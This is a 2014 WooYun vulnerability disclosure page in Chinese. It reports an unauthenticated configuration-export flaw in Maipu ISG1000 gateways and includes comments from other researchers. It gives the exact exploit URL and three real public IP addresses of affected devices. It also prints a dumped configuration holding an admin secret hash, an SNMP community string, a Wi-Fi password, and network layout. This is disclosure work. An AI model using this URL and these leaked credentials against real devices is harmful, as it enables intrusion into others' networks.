当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-079924

漏洞标题:迈普ISG1000系列网关存在权限不当导致信息泄露

相关厂商:maipu.cn

漏洞作者: 路人甲

提交时间:2014-10-21 10:54

修复时间:2014-12-30 14:44

公开时间:2014-12-30 14:44

漏洞类型:非授权访问/权限绕过

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-21: 细节已通知厂商并且等待厂商处理中
2014-10-26: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-12-20: 细节向核心白帽子及相关领域专家公开
2014-12-30: 细节向普通白帽子公开
2015-01-09: 细节向实习白帽子公开
2014-12-30: 细节向公众公开

简要描述:

rt

详细说明:

根据官网介绍迈普ISG1000系列网关存在9种产品

http://www.maipu.cn/productmes.aspx?id=2266


由于权限问题,导致网关配置文件未授权下载,以下利用方式:

https://url/system/maintenance/export.php?type=sc


https://122.224.165.114/login.html
https://119.4.164.42/login.html
https://61.143.203.86/login.html

漏洞证明:

<poc>

1.jpg


!config
authorized-table admin
authorized read all
authorized write all
!
user administrator admin local secret Hg6MAD7MGTUEcoT9gHG+LhDc6E07QwG71SmiEodL/fQT/YirzsAURqDjk69469y authorized-table admin
user administrator admin authorized-address first 0.0.0.0/0
!
timezone 57
!
!wlan global config
wlan-global
wlan country-code default
wlan channel auto
wlan max-power default
wlan radio-type 80211bgn
wlan enable
!
interface bvi1
ip address 192.168.2.254/24
allow access https
allow access http
allow access ping
allow access ssh
allow access telnet
!
interface eth0
ip address 122.224.165.114/30
allow access https
allow access http
allow access ping
allow access ssh
allow access telnet
!
interface eth1
ip address 123.157.156.230/30
allow access https
allow access http
allow access ping
allow access ssh
allow access telnet
!
interface eth2
bridge-group 1
!
interface eth3
bridge-group 1
!
interface eth4
bridge-group 1
allow access https
allow access http
allow access ping
allow access ssh
allow access telnet
!
interface eth5
bridge-group 1
!
interface eth6
bridge-group 1
!
interface eth7
bridge-group 1
!
interface eth8
bridge-group 1
!
interface eth9
bridge-group 1
!
interface wlan0
ssid maipu
ssid hide disable
beacon interval default
client max-count 30
client isolation disable
dtim default
security-mode wpa2
wpa2 auth-method psk maipu123 encry-method aes
!
!address
!
address lan
description neiwang
ip subnet 192.168.2.0/24
!
!address-group
!
!service
!
!service-group
!
service-group 常用服务
!
service-group 常用服务
member telnet
member tcp
member ping
member dns
member icmp
member https
member http
!
!schedule-day
!
!schedule-week
!
!schedule-month
!
!schedule-once
!
!user
!
!user-group
!
!
!user-policy
!
!
application-group p2p
description p2p下载
application-group 流媒体
description 流媒体软件
application-group 网络游戏
!
!
!
policy any any any any any any p2p always deny 1
application 流媒体
application 网络游戏
policy any any any any 常用服务 any any always permit 2
policy default-action permit
!
snmp
community secret 6NSjZ2FJfHqUtCqRXdechDETsW7nP4FFcq1ujxx1HotuCZoZGsn14R7gwFVplw1
syslocation Beijing
!
dhcp
share-net wlan0_dhcps subnet 192.168.0.1/24
share-net wlan0_dhcps 192.168.0.1 192.168.0.250 0 days 8 hours 0 mins
share-net wlan0_dhcps gateway 192.168.0.1
share-net wlan0_dhcps dns 202.106.0.20 8.8.8.8
!
!
router ospf
!
!
ip route 0.0.0.0/0 122.224.165.113
ip route 0.0.0.0/0 123.157.156.229 100 weight 100
!
!user-param
!
!user-webauth
!
!user-portal-server
!
ip nat source eth0 lan any any interface 1
ip nat source eth1 lan any any interface 2
!
!
!ip session limit
!
!
!
audit_log database on
audit_log syslog on
!
ip defend port-scan interface eth0 threshold 1000
ip defend ip-sweep interface eth0 threshold 1000
ip defend port-scan interface eth1 threshold 1000
ip defend ip-sweep interface eth1 threshold 1000
ip defend port-scan interface bvi1 threshold 1000
ip defend ip-sweep interface bvi1 threshold 1000
!
qos-profile line 电信
limit both
maxbandwidth ingress 20000
maxbandwidth egress 20000
match interface eth0
!
qos-profile channel 限速 parent 电信
bandwidth ingress 2000
maxbandwidth ingress 20000
bandwidth egress 2000
maxbandwidth egress 20000
perip ingress 2000
perip egress 2000
priority high
match user any
match application any
!
qos-profile channel def_电信 parent 电信
!
ha-config
!end


密文应该是base64(3des(md5(xxx),keys))

aaaaaaaaaaaaa2.jpg

</poc>

修复方案:

权限问题,你们懂的。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-12-30 14:44

厂商回复:

漏洞Rank:12 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论

  1. 2014-10-26 16:33 | YY-2012 ( 普通白帽子 | Rank:2763 漏洞数:641 | 意淫,是《红楼梦》原创的词汇,但后来演变...)

    @疯狗 @Finger @浩天 看了厂商的洞,都是忽略的(请把厂商注销掉),求补rank

  2. 2014-10-27 14:17 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @YY-2012 rank已补,关于厂商。@迈普通信技术股份有限公司 醒醒,醒醒啊,白帽子在给你报告漏洞啊。。。

  3. 2014-10-27 14:19 | YY-2012 ( 普通白帽子 | Rank:2763 漏洞数:641 | 意淫,是《红楼梦》原创的词汇,但后来演变...)

    @疯狗 别激动。。